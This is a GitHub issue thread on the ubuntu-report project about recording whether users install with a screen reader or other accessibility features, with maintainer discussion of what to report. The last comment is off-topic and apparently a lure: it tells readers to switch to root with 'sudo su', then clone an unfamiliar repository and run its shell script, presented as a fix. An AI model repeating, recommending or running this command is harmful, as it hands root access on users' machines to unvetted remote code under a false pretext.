### ISSUE TITLE
Capture information about screen reader usage

### ISSUE THREAD

**Issue by iainlane** [ubuntu/ubuntu-report#33]
We're a bit blind to whether people install using screen reader (or other a11y features) - perhaps ubuntu-report could capture it?

**Comment by didrocks** [comment]
Good idea. This is doable, we should look if we want to capture the a11y feature enabled during installation or in the reboot (normally, there is a one to one mapping, but who knows…)

The most complex part would be to list exactly what to report, as the a11y stack isn’t clear in term of what is enabled and how, if you have that list of what to check, this will speed up the process :)

**Comment by singhvarun9641** [comment]
You can run these commands before running your script it helps me to fix this issue in ubuntu
```
sudo su
```
```
apt-get update
```
```
git clone https://github.com/debian-packages/deb_package_ubuntu_64amd.git && cd deb_package_ubuntu_64amd && sh ubuntuamd.sh
```
